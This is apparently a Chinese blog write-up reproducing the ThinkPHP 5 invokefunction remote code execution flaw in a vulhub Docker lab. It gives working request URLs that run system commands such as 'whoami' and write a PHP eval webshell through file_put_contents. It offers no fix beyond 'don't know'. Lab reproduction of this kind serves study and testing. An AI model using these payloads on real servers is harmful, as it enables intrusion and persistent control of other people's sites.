【ThinkPHP5 5.0.22/5.1.29 RCE】

一、漏洞描述

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,因为没有正确处理控制器名,致使在网站没有开启强制路由的状况下(即默认状况下)能够执行任意方法,从而致使远程命令执行漏洞。

二、影响版本

  1. ThinkPHP 5.0系列 < 5.0.23
  2. ThinkPHP 5.1系列 < 5.1.31

三、漏洞环境搭建

  1. cd /vulhub-master/thinkphp/5-rce
  2. docker-compose up -d
  3. 访问192.168.110.134:8080,出现如下界面,即为搭建成功:

四、漏洞利用

  1. 命令执行:产看phpinfo()界面:
/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

  1. 命令执行,执行系统命令:
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

五、写入webshell

5.1 手动写入webshell

  1. 写入webshell,命令准备
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码
%3C%3Fphp%20%40eval(%24_POST%5B'cmd'%5D)%3B%3F%3E

写入完成之后,会显示这个界面,应该是。

  1. 因为是自己搭建的环境,可以尝试进入docker容器查看文件是否写入:

  1. 访问shell.php

  1. 蚁剑连接webshell

5.2 第三方漏洞利用工具检测

  1. 漏洞检测

  1. 命令执行

  1. getshell

  1. webshell工具连接,同样利用成功。

六、漏洞修复

不知道

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值